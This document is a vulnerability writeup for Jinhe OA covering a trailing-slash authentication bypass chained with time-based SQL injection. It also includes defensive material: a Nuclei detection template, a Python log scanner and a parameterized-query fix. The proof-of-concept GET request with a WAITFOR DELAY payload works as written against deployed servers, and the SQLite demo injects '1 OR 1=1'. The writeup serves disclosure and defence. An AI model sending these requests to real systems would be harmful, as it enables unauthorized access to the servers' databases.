Authentication Bypass and SQL Injection
Proof of Concept
GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=1;WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
Host: {{Hostname}}
Nuclei Template
id: jinhe-oa-auth-bypass-sqli

info:
  name: Jinhe OA Authentication Bypass SQL Injection
  author: security-researcher
  severity: critical
  description: Detects authentication bypass and time-based SQL injection vulnerability
  tags: authentication-bypass,sqli,time-based,oa

http:
  - raw:
      - |
        @timeout: 15s
        GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=1;WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
        Host: {{Hostname}}

    # all three conditions must hold: the request is served (no 302 to the login
    # page), the 3-second delay is observed, and the backend error string is present
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration>=3'
          - 'contains(body, "连接失败")'
        condition: and
Vulnerability Analysis
The vulnerability consists of two main components:
- Authentication Bypass via URL Path Manipulation
- SQL Injection in Backend Interface
Routing Mechanism
Login page URL: /C6/Jhsoft.Web.login/PassWordSlideFull.aspx
The application follows a specific routing pattern:
- Jhsoft.Web.login corresponds to Jhsoft.Web.login.dll
- PassWordSlideFull.aspx corresponds to the PassWordSlideFull class
Authentication Bypass Technique
A normal request to /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx results in a 302 redirect to the login page.
However, adding a trailing slash (/) to the URL, /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/, bypasses the authentication check and allows direct access to the backend interface.
Web.config Configuration Analysis
Modules Configuration
<modules runAllManagedModulesForAllRequests="true">
<add name="JHSoft.CustomQuery" type="JHSoft.CustomQuery.HttpUploadModule, JHSoft.CustomQuery">
</add>
<add name="HttpUploadModule" type="JHWeb.qqfly.Upload.HttpUploadModule, JHWeb.qqfly.Upload">
</add>
<add name="JHSoft.Log" type="JHSoft.Log.LogHttpModule, JHSoft.Log">
</add>
</modules>
The JHSoft.Log module performs security checks including:
- SQL injection prevention
- Whitelist validation for frontend interfaces
- Session authentication for non-whitelisted endpoints
Handlers Configuration
<handlers>
<remove name="ExtensionlessUrlHandler-Integrated-4.0" />
<remove name="OPTIONSVerbHandler" />
<remove name="TRACEVerbHandler" />
<add name="AjaxMethod" verb="POST,GET" path="ajax/*.ashx" type="Ajax.PageHandlerFactory, Ajax"/>
<add name="scissors" path="scissors.axd" verb="*" type="BitmapCutter.Core.HttpHandler.BitmapScissors,BitmapCutter.Core" />
<add name="ExtensionlessUrlHandler-Integrated-4.0" path="*." verb="*" type="System.Web.Handlers.TransferRequestHandler" preCondition="integratedMode,runtimeVersionv4.0" />
</handlers>
The ExtensionlessUrlHandler with path="*." matches URLs with file extensions and can parse paths containing trailing slashes.
Bypass Mechanism
The vulnerability arises from the different URL parsing behaviors between:
- the JHSoft.Log module (checks for the .aspx extension)
- the ExtensionlessUrlHandler (handles URL routing)
When accessing backend-interface.aspx/, the JHSoft.Log module fails to recognize the .aspx extension due to the trailing slash, bypassing authentication checks. However, the ExtensionlessUrlHandler correctly routes the request to the intended endpoint.
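The discrepancy described in this section and in the Authentication Bypass Technique section above can be modelled directly. The following is an added example, not code from the writeup or from the vendor: it assumes that the security module's check is a literal `.aspx` suffix test on the raw path (`module_check_naive`) and that the routing handler resolves `page.aspx/` and `page.aspx/extra` to `page.aspx` (`route_resolve`); the whitelist contains only the login page named in this writeup, and the log lines are constructed. The hardened check (`module_check_fixed`) decides on the same canonical path the router resolves, and `scan_log` applies the model to web-server log lines, which is where a defender would use it. It generalises slightly beyond the page by also treating `page.aspx/anything` as the same page.

```python
"""Model of the trailing-slash parsing discrepancy, plus a log triage helper.

Assumptions (this is an illustrative model, not the vendor's code):
  * the security module requires a session only when the raw path literally
    ends in .aspx (module_check_naive);
  * the routing handler resolves "page.aspx/" and "page.aspx/extra" to
    "page.aspx" (route_resolve);
  * the only whitelisted path we know of is the login page from the writeup.
"""
import re
from urllib.parse import unquote, urlsplit

# Login page path taken from the writeup; other whitelist entries are unknown.
WHITELIST = {"/c6/jhsoft.web.login/passwordslidefull.aspx"}

# "<page>.aspx" optionally followed by "/" and extra path info.
_ASPX_ROUTE = re.compile(r"^(?P<page>.*?\.aspx)(?:/.*)?$", re.IGNORECASE)

# Time-based SQL injection marker used by the proof of concept above.
_TIME_BASED = re.compile(r"waitfor\s+delay", re.IGNORECASE)


def route_resolve(raw_url: str) -> str:
    """Canonical page (lower-cased) that the router would serve for this URL."""
    path = urlsplit(raw_url).path.lower()
    m = _ASPX_ROUTE.match(path)
    return m.group("page") if m else path


def module_check_naive(raw_url: str) -> bool:
    """Flawed check: a session is required only when the raw path literally
    ends in .aspx, so 'page.aspx/' is not recognised as a page at all."""
    path = urlsplit(raw_url).path.lower()
    if path in WHITELIST:
        return False
    return path.endswith(".aspx")


def module_check_fixed(raw_url: str) -> bool:
    """Hardened check: decide on the canonical path the router resolves, so the
    module and the handler can no longer disagree about which page is hit."""
    page = route_resolve(raw_url)
    if page in WHITELIST:
        return False
    return page.endswith(".aspx")


def is_bypass_attempt(raw_url: str) -> bool:
    """True when the naive module skips authentication for a request that the
    router still delivers to a protected .aspx page."""
    return module_check_fixed(raw_url) and not module_check_naive(raw_url)


# Constructed W3C-style log lines (not real traffic):
# date time method uri-stem uri-query status
SAMPLE_LOG = """\
2024-01-01 10:00:00 GET /C6/Jhsoft.Web.login/PassWordSlideFull.aspx - 200
2024-01-01 10:00:01 GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx interfaceID=1 302
2024-01-01 10:00:02 GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/ interfaceID=1;WAITFOR%20DELAY%20'0:0:3'-- 200
2024-01-01 10:00:03 GET /C6/static/logo.png - 200
"""


def scan_log(log_text: str) -> list:
    """Flag log entries whose path would slip past the naive module; note
    whether the query string also carries a time-based SQLi marker."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        date, time, method, stem, query, status = line.split()
        url = stem if query == "-" else f"{stem}?{query}"
        if is_bypass_attempt(url):
            findings.append({
                "time": f"{date} {time}",
                "method": method,
                "page": route_resolve(url),
                "status": int(status),
                "time_based_sqli": bool(_TIME_BASED.search(unquote(query))),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A status of 200 on a flagged line is the strongest signal: a correctly protected backend page would have answered the unauthenticated request with the 302 seen on the line before it.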
SQL Injection Details
The RssModulesHttp.aspx interface contains a SQL injection vulnerability where user input is directly concatenated into SQL queries without proper sanitization.
Example vulnerable code structure:
// user-controlled interfaceID is concatenated straight into the SQL text
string query = "SELECT * FROM data WHERE interfaceID = " + Request.QueryString["interfaceID"];
SqlCommand cmd = new SqlCommand(query, connection);
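To make the difference between that concatenation and a parameterized query observable, here is an added example that is not the vendor's code: it mirrors the vulnerable pattern and its fix against an in-memory SQLite table (SQLite stands in for SQL Server, and the table and rows are constructed for the demo). `query_concat` reproduces the string splice from the snippet above, `query_param` binds the value as a parameter, and `query_param_strict` additionally validates the identifier at the boundary.

```python
"""Concatenated versus parameterized query, run against a constructed table.

SQLite is used here only so the example runs offline; the pattern is the same
for SqlCommand/SqlParameter in the ASP.NET code base the writeup describes.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the application's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE data (interfaceID INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO data VALUES (?, ?)",
        [(1, "rss"), (2, "calendar"), (3, "mail")],
    )
    return conn


def query_concat(conn: sqlite3.Connection, interface_id: str) -> list:
    """Vulnerable: same shape as
    "... WHERE interfaceID = " + Request.QueryString["interfaceID"].
    Whatever the client sends becomes part of the SQL text."""
    sql = "SELECT name FROM data WHERE interfaceID = " + interface_id
    return [row[0] for row in conn.execute(sql)]


def query_param(conn: sqlite3.Connection, interface_id) -> list:
    """Fixed: the value is bound as a parameter and is never parsed as SQL."""
    sql = "SELECT name FROM data WHERE interfaceID = ?"
    return [row[0] for row in conn.execute(sql, (interface_id,))]


def query_param_strict(conn: sqlite3.Connection, interface_id: str) -> list:
    """Fixed plus input validation: interfaceID must be an integer before it
    reaches the database layer at all."""
    if not interface_id.isdigit():
        raise ValueError("interfaceID must be a positive integer")
    return query_param(conn, int(interface_id))


if __name__ == "__main__":
    db = make_db()
    # Constructed boolean payload: the concatenated form returns every row,
    # the parameterized form compares against the literal string and returns none.
    print("concat :", query_concat(db, "1 OR 1=1"))
    print("param  :", query_param(db, "1 OR 1=1"))
    print("strict :", query_param_strict(db, "2"))
```

With the parameterized form, the stacked-query payload from the proof of concept above is likewise just a string the database compares against the column; it is never executed as a second statement.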
Additional SQL Injection Vector
Another SQL injection exists in the AuthOtherServerLoginUrl method. This requires proper AES encryption and database context specification for successful exploitation.
Security Recommendations
- Implement proper input validation and use parameterized queries (prepared statements) for all database operations
- Eliminate the trailing-slash URL parsing discrepancy between the JHSoft.Log module and the ExtensionlessUrlHandler, so both decide on the same canonical path
- Enforce authentication checks consistently across all endpoints
- Implement proper error handling so that database errors such as the "连接失败" message are not returned to the client